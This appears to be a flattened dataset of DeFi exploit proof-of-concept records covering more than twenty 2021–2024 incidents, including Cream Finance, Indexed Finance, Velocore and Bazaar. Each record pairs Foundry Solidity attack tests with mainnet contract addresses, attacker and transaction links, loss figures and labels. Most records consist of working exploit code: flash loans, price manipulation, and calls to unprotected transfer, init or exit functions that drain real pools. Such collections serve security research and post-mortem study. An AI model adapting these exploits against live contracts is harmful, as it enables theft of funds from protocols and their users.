function testExploit() public { emit log_named_uint("Before exploit, cftoken balance:", ICFToken(cftoken).balanceOf(address(msg.sender))); ICFToken(cftoken)._transfer(cfpair, payable(msg.sender), 1_000_000_000_000_000_000_000); emit log_named_uint("After exploit, cftoken balance:", ICFToken(cf...
true
Unknown
2.82
low
cftoken Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x6CD71A07E72C514f5d511651F6808c6395353968)); IPancakePair usdtYeedHoSwapPair = IPancakePair(0x33d5e574...
exploit_poc
Zeed
2022-04
Zeed_exp.sol
null
73d4fc78a7ff07aa
2026-01-07T10:59:16.520110
postmortems
unknown
17,132,514
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { yeed.approve(address(pancakeRouter), type(uint256).max); (uint112 _reserve0, uint112 _reserve1,) = usdtYeedHoSwapPair.getReserves(); usdtYeedHoSwapPair.swap(0, _reserve1 - 1, address(this), new bytes(1)); emit log_named_uint("Before exploit, USDT balance o...
true
Unknown
3.16
low
Zeed Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED //Credit: Cache_And_Burn pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Eleven Finance Exploit POC tx hash: 0x6450d8f4db09972853e948bee44f2cb54b9df786dace774106cd28820e906789 https://peckshield.medium.com/eleven-finance-incident-root-caus...
exploit_poc
Eleven
2021-06
Eleven_exp.sol
flash_loan
7dcfe8b9845dccff
2026-01-07T10:59:16.520153
postmortems
unknown
8,530,973
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { console.log("-------Start exploit-------"); console.log("attacker BUSD balance before is", busd.balanceOf(address(this))); cheats.startPrank(0xc71e2F581b77De945C8A7A191b0B238c81f11eD6); //Take a flashloan from apeswap IPancakePair(ape_lp).swap(0...
true
Unknown
5.05
medium
Eleven Exploit (2021-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // Attacker : https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19 // Attack Contract : https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945 // Attack Tx : https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3...
exploit_poc
xWin
2021-06
xWin_exp.sol
flash_loan
0f20938c803ce8f7
2026-01-07T10:59:16.520201
postmortems
bsc
8,589,725
null
null
https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19
https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945
null
https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3ff53ac46ee08d691883ac05c1d
null
null
false
true
true
medium
null
flash-loan
false
https://bscscan.com/address/0xb63f0d8b9aa0c4e68d5630f54bfefc6cf2c2ad19
https://bscscan.com/address/0x67d3737c410f4d206012cad5cb41b2e155061945
https://bscscan.com/tx/0xba0fa8c150b2408eec9bbbbfe63f9ca63e99f3ff53ac46ee08d691883ac05c1d
Unknown
6
medium
xWin Exploit (2021-06)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Vulnerable contract: https://bscscan.com/address/0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300#code Attack TX: https://bscscan.com/tx/0x765de8357994a206bb90af57dcf427f48a2021f2f28ca81f2c00b...
exploit_poc
PancakeHunny
2021-06
PancakeHunny_exp.sol
null
df166a897e20c3ca
2026-01-07T10:59:16.520279
postmortems
bsc
7,962,338
null
null
null
null
https://bscscan.com/address/0x109Ea28dbDea5E6ec126FbC8c33845DFe812a300#code
https://bscscan.com/tx/0x765de8357994a206bb90af57dcf427f48a2021f2f28ca81f2c00bc3b9842be8e
null
null
false
false
false
medium
null
unknown
function testExploit() public { wbnb.deposit{value: 5.752 ether}(); wbnb.transfer(address(this), 5.752 ether); //WBNB was swapped to CAKE at PancakeSwap address[] memory path = new address[](2); path[0] = address(wbnb); path[1] = address(cake); pancakeRouter.swap...
true
Unknown
5.69
medium
PancakeHunny Exploit (2021-06)
false
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis interface SdoRewardPOOL { function deposit(uint256 _pid, uint256 _amount) external; function withdraw(uint256 _pid, uint256 _amount) external; function harvestAllRewards() external; function updatePool( ...
exploit_poc
SafeDollar
2021-06
SafeDollar_exp.sol
null
55394bc7c4189f27
2026-01-07T10:59:16.520346
postmortems
unknown
16,225,172
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public payable { PLX.approve(address(Pool), type(uint256).max); WMATIC.approve(address(Router), type(uint256).max); (reserve0Pair1, reserve1Pair1,) = Pair1.getReserves(); (reserve0Pair2, reserve1Pair2,) = Pair2.getReserves(); address(WMATIC).call{value: 10_...
true
Unknown
5
medium
SafeDollar Exploit (2021-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); I88mph mphNFT = I88mph(0xF0b7DE03134857391d8D43Ed48e20EDF21461097); function...
exploit_poc
88mph
2021-06
88mph_exp.sol
null
0e68dfabcb32f73f
2026-01-07T10:59:16.520408
postmortems
unknown
12,516,705
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { console.log("Before exploiting, NFT contract owner:", mphNFT.owner()); /* The vulnerability was an unprotected init() function in the code of these specific pools
true
Unknown
2.81
low
88mph Exploit (2021-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://medium.com/immunefi/hack-analysis-cream-finance-oct-2021-fc222d913fc5 // @TX // https://etherscan.io/tx/0x0fe2542079644e107cbf13690eb9c2c65963ccb79089ff96bfaf8dced2331c92 /...
exploit_poc
Cream_2
2021-10
Cream_2_exp.sol
flash_loan
da1e7ade50666655
2026-01-07T10:59:16.520456
postmortems
ethereum
13,499,797
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { SecondContract exploitContract = new SecondContract(); secondContract = address(exploitContract); console.log("[1. Beigin]"); console.log("------------Acquire Capital------------"); console.log("[2. MakerDao FlashLoan 500_000_000 DAI]"); Da...
true
Unknown
6
medium
Cream_2 Exploit (2021-10)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; // @author: https://github.com/Crypto-Virus/indexed-finance-exploit-example/blob/master/contracts/IndexedAttack.sol // @Analyses: // https://blocksecteam.medium.com/the-analysis-of-indexed-finance-security-incident-8a62b9799836 // ...
exploit_poc
IndexedFinance
2021-10
IndexedFinance_exp.sol
null
fbdba71c735293fe
2026-01-07T10:59:16.520594
postmortems
ethereum
13,417,948
null
null
null
null
null
https://etherscan.io/tx/0x44aad3b853866468161735496a5d9cc961ce5aa872924c5d78673076b1cd95aa
null
null
false
false
false
medium
null
unknown
function testHack() public { address[] memory tokensBorrow = new address[](6); tokensBorrow[0] = 0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984; tokensBorrow[1] = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9; tokensBorrow[2] = 0xc00e94Cb662C3520282E6f5717214004A7f26888; tokensBorrow[3]...
true
Unknown
6
medium
IndexedFinance Exploit (2021-10)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Profit : ~52777 USD // Attacker: https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e // Attack Contract: https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a...
exploit_poc
Will
2024-06
Will_exp.sol
null
47dcd1845ea7a360
2026-01-07T10:59:16.520691
postmortems
bsc
39,979,796
null
null
https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e
https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a1#code
null
null
null
null
false
false
false
medium
null
unknown
function attack() public { USDT.approve(address(trading), type(uint256).max); trading.placeSellOrder(71_000 ether, 0, 0); swap_token_to_token(address(USDT), address(will), 88_000 ether); /////step---2 vm.warp(block.timestamp + 20); trading.updateExpiredOrders(); t...
true
https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e
https://bscscan.com/address/0x63b4de190c35f900bb7adf1a13d66fb1f0d624a1#code
Unknown
4.32
low
Will Exploit (2024-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~59643 USD // TX : https://app.blocksec.com/explorer/tx/bsc/0x556419e0a6ee8e6de6b3679605f9f62ad013007419a1b55c9f56590a824bfb52 // Attacker : https://bscscan.com/address...
exploit_poc
INcufi
2024-06
INcufi_exp.sol
null
e3552b10bc81b3df
2026-01-07T10:59:16.520751
postmortems
bsc
39,729,927
~59643 USD
59,643
https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e
https://bscscan.com/address/0x4237d006471b38af0e1691c00d96193a8ff5709f
null
null
null
null
true
false
false
medium
~59643 USD
unknown
function testExploit() public { emit log_named_decimal_uint("[End] Attacker BUSD before exploit", BUSD.balanceOf(address(this)), 18); attack(); emit log_named_decimal_uint("[End] Attacker Ncufi after exploit", AKITADEF.balanceOf(address(this)), 18); emit log_named_decimal_uint("[End] Att...
true
https://bscscan.com/address/0xb6911dee6a5b1c65ad1ac11a99aec09c2cf83c0e
https://bscscan.com/address/0x4237d006471b38af0e1691c00d96193a8ff5709f
$59.6K
7
medium
INcufi Exploit (2024-06)
true
false
false
false
pragma solidity ^0.8.10; import "../basetest.sol"; import "./../interface.sol"; // Profit : ~3.4 ETH // Attacker: https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892 // Attack Contract: https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada // TX1 : https://etherscan.io/tx/0xda8f6...
exploit_poc
WIFCOIN_ETH
2024-06
WIFCOIN_ETH_exp.sol
null
56478ff278965548
2026-01-07T10:59:16.520814
postmortems
ethereum
20,103,189
null
null
https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892
https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public balanceLog { //Paths address[] memory buyPath = new address[](2); buyPath[0] = address(router.WETH()); // weth buyPath[1] = address(Wif); // token address[] memory sellPath = new address[](2); sellPath[0] = buyPath[1]; sellPath[1] = b...
true
https://etherscan.io/address/0x394ba273315240510b61ca22ba152e3478a45892
https://etherscan.io/address/0x93d4f6f84d242c7959f8d1f1917ddbc9fb925ada
Unknown
4.16
low
WIFCOIN_ETH Exploit (2024-06)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $6.4K // Attacker : https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984 // Attack Contract : https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68 // Attack Tx : https://bscs...
exploit_poc
NCD
2024-06
NCD_exp.sol
flash_loan
02368c90fb4219c8
2026-01-07T10:59:16.520856
postmortems
bsc
39,253,639
$6.4K
6,400
https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984
https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68
null
https://bscscan.com/tx/0xbfb9b3b8a0d3c589a02f06c516b5c7b7569739edd00f9836645080f2148aefc7
null
null
true
false
true
low
$6.4K
flash-loan
function testExploit() public { deal(address(usdc_), address(this), 10 ether); //Assume this is an exchange for uniswap, not flashloan! emit log_named_decimal_uint("ack before usdc_ balance = ", usdc_.balanceOf(address(this)), usdc_.decimals()); address[] memory path = new address[](2); ...
true
$6.4K
https://bscscan.com/address/0xd52f125085b70f7f52bd112500a9c334b7246984
https://bscscan.com/address/0xfad2a0642a44a68606c2295e69d383700643be68
https://bscscan.com/tx/0xbfb9b3b8a0d3c589a02f06c516b5c7b7569739edd00f9836645080f2148aefc7
$6.4K
8.52
high
NCD Exploit (2024-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 15k // Attacker : https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd // Attack Contract : https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8...
exploit_poc
Crb2
2024-06
Crb2_exp.sol
flash_loan
e18f3c53ac781372
2026-01-07T10:59:16.520907
postmortems
bsc
null
15k
15,000
https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd
https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8107b1D46280
https://bscscan.com/address/0xee6De822159765daf0Fd72d71529d7ab026ec2f2
https://bscscan.com/tx/0xde59f5bd65e8f48e5b6137a3b4251afbb9b6240d1036fa6f030e21ab6d950aac
null
null
true
true
true
medium
15k
flash-loan
function testExploit() public { vm.startPrank(user, user); busd.approve(address(router), type(uint256).max); busd.approve(address(this), type(uint256).max); crb_token.approve(address(this), type(uint256).max); vm.stopPrank(); emit log_named_decimal_uint("busd", busd.balan...
true
15k
https://bscscan.com/address/0x65bba34c11add305cb2a1f8a68cecbd6e75089cd
https://bscscan.com/address/0x73ceea4C6571DbCf9BCc9eA77b1D8107b1D46280
https://bscscan.com/address/0xee6De822159765daf0Fd72d71529d7ab026ec2f2
https://bscscan.com/tx/0xde59f5bd65e8f48e5b6137a3b4251afbb9b6240d1036fa6f030e21ab6d950aac
$15.0K
9.06
high
Crb2 Exploit (2024-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Profit : ~9 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0x6beb21b53f5b205c088570333ec875b720e333b49657f7026b01ed72b026851e?line=19 // Attacker : https://etherscan.io/address/0xb297735e...
exploit_poc
APEMAGA
2024-06
APEMAGA_exp.sol
null
542b7ca34c233dff
2026-01-07T10:59:16.520958
postmortems
ethereum
20,175,261
null
null
https://etherscan.io/address/0xb297735e9fb3e695ccce3963bfe042f318901ea0
https://etherscan.io/address/0x8de6314058c0b7eea809881d73e69b425c01f0b5#code
https://etherscan.io/address/0x56ff4afd909aa66a1530fe69bf94c74e6d44500c
null
null
null
false
false
false
medium
null
unknown
function attack() public { swap_token_to_ExactToken(0.1 ether, address(WETH), address(Apemaga), 8000 ether); // emit log_named_decimal_uint("[End] Attacker token before exploit", Apemaga.balanceOf(address(this)), Apemaga.decimals()); Apemaga.family(address(Pair)); Apemaga.family(address...
true
https://etherscan.io/address/0xb297735e9fb3e695ccce3963bfe042f318901ea0
https://etherscan.io/address/0x8de6314058c0b7eea809881d73e69b425c01f0b5#code
https://etherscan.io/address/0x56ff4afd909aa66a1530fe69bf94c74e6d44500c
Unknown
5.39
medium
APEMAGA Exploit (2024-06)
false
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$91k // Attacker : https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8 // Attack Contract : https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100...
exploit_poc
SteamSwap
2024-06
SteamSwap_exp.sol
null
ede6c569bff45a7d
2026-01-07T10:59:16.521005
postmortems
bsc
null
~$91k
91,000
https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8
https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100b87437a9
https://bscscan.com/address/0xb7d0a1adafa3e9e8d8e244c20b6277bee17a09b6
https://bscscan.com/tx/0x40f3bdd0a3a8d0476ae6aa2875dc2ec60b80812e2a394b67a88260df57c65522
null
null
true
true
false
medium
~$91k
unknown
function testExploit() public balanceLog { //implement exploit code here ICake_LP(Cake_LP).sync(); uint256 amount0 = 500_000_000_000_000_000_000_000; IPancakeV3PoolActions(PancakeV3Pool).flash(address(this), amount0, 0, ""); }
true
~$91k
https://bscscan.com/address/0xb2d546547168f61debf0a780210b5591e4dd39a8
https://bscscan.com/address/0xa4fd1beac3b5fb78a8ec074338152100b87437a9
https://bscscan.com/address/0xb7d0a1adafa3e9e8d8e244c20b6277bee17a09b6
https://bscscan.com/tx/0x40f3bdd0a3a8d0476ae6aa2875dc2ec60b80812e2a394b67a88260df57c65522
$91.0K
7.49
medium
SteamSwap Exploit (2024-06)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Profit : ~9.2 ETH // Attacker: https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113 // Attack Contract: https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6 // TX : https://etherscan.io/tx/0xe82...
exploit_poc
JokInTheBox
2024-06
JokInTheBox_exp.sol
flash_loan
fc15fc2da16526f4
2026-01-07T10:59:16.521047
postmortems
ethereum
20,054,628
null
null
https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113
https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { address[] memory path = new address[](2); path[0] = address(weth_); // weth path[1] = address(jok_); // token vm.deal(address(this), 0.2 ether); // flashLoan router_.swapExactETHForTokens{value: 0.2 ether}(0, path, address(this), block.timestamp);...
true
https://etherscan.io/address/0xfcd4acbc55df53fbc4c9d275e3495b490635f113
https://etherscan.io/address/0x9d3425d45df30183fda059c586543dcdeb5993e6
Unknown
5.16
medium
JokInTheBox Exploit (2024-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $13.8K // Attack Tx : https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1 // Attacker Address : https://bscscan....
exploit_poc
MineSTM
2024-06
MineSTM_exp.sol
null
2f097f10f54f5277
2026-01-07T10:59:16.521092
postmortems
bsc
39,383,150
$13.8K
13,800
null
https://bscscan.com/address/0x88c17622d33b327268924e9f90a9e475a244e3ab
null
https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1
null
null
true
false
false
medium
$13.8K
unknown
function testExploit() public { BUSDT_USDC.flash(address(this), flashBUSDTAmount, 0, abi.encodePacked(uint256(1))); emit log_named_decimal_uint("Profit: ", BUSDT.balanceOf(address(this)), 18); }
true
$13.8K
https://bscscan.com/address/0x88c17622d33b327268924e9f90a9e475a244e3ab
https://app.blocksec.com/explorer/tx/bsc/0x849ed7f687cc2ebd1f7c4bed0849893e829a74f512b7f4a18aea39a3ef4d83b1
$13.8K
6.09
medium
MineSTM Exploit (2024-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $6.88M // Attack Tx : https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1 // Attacker Address : https://lineascan.build/addres...
exploit_poc
Velocore
2024-06
Velocore_exp.sol
null
1591fd5c41cc8fbb
2026-01-07T10:59:16.521143
postmortems
unknown
5,079,177
$6.88M
6,880,000
null
https://lineascan.build/address/0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a
null
https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1
null
null
true
true
false
critical
$6.88M
unknown
function testExploit() public { // 1. Check the total Supply Before Attack of VLP uint256 totalSupplyBeforeAttack = ConstantProductPool(USDC_ETH_VLP).totalSupply(); // console.log("total Supply Before Attack:", totalSupplyBeforeAttack); // 2. Call velocore__execute function three times...
true
$6.88M
https://lineascan.build/address/0xb7f6354b2cfd3018b3261fbc63248a56a24ae91a
https://lineascan.build/tx/0xed11d5b013bf3296b1507da38b7bcb97845dd037d33d3d1b0c5e763889cdbed1
$6.88M
7.77
medium
Velocore Exploit (2024-06)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 1.4M // Attacker : https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884 // Attack Contract : https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c...
exploit_poc
Bazaar
2024-06
Bazaar_exp.sol
null
8a5d7098926b3495
2026-01-07T10:59:16.521201
postmortems
unknown
null
1.4M
1,400,000
https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884
https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c7bf88a3e402
https://blastscan.io/address/0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB
https://blastscan.io/tx/0x7fdd140f7631f62d62f7256ee4a38af51a4723ad5d66adc9b9685bf78f750f2d
null
https://x.com/shoucccc/status/1800353122159833195
true
true
false
critical
1.4M
unknown
function testExploit() public balanceLog { vulnVault.exitPool(TARGET_ID, HOLDER_TO_TAKE_FROM, payable(address(this)), buildExitPoolRequest()); assertEq(getFundingBal(), EXPECTED_ETH, "Did not get expected ETH"); }
true
1.4M
https://blastscan.io/address/0x3cf5B87726Af770c94494E886d2A69c42A203884
https://blastscan.io/address/0xd31c7a22f4e6f928f1d4adabbc08c7bf88a3e402
https://blastscan.io/address/0xefb4e3Cc438eF2854727A7Df0d0baf844484EdaB
https://blastscan.io/tx/0x7fdd140f7631f62d62f7256ee4a38af51a4723ad5d66adc9b9685bf78f750f2d
https://x.com/shoucccc/status/1800353122159833195
$1.40M
7.32
medium
Bazaar Exploit (2024-06)
true
true
true
false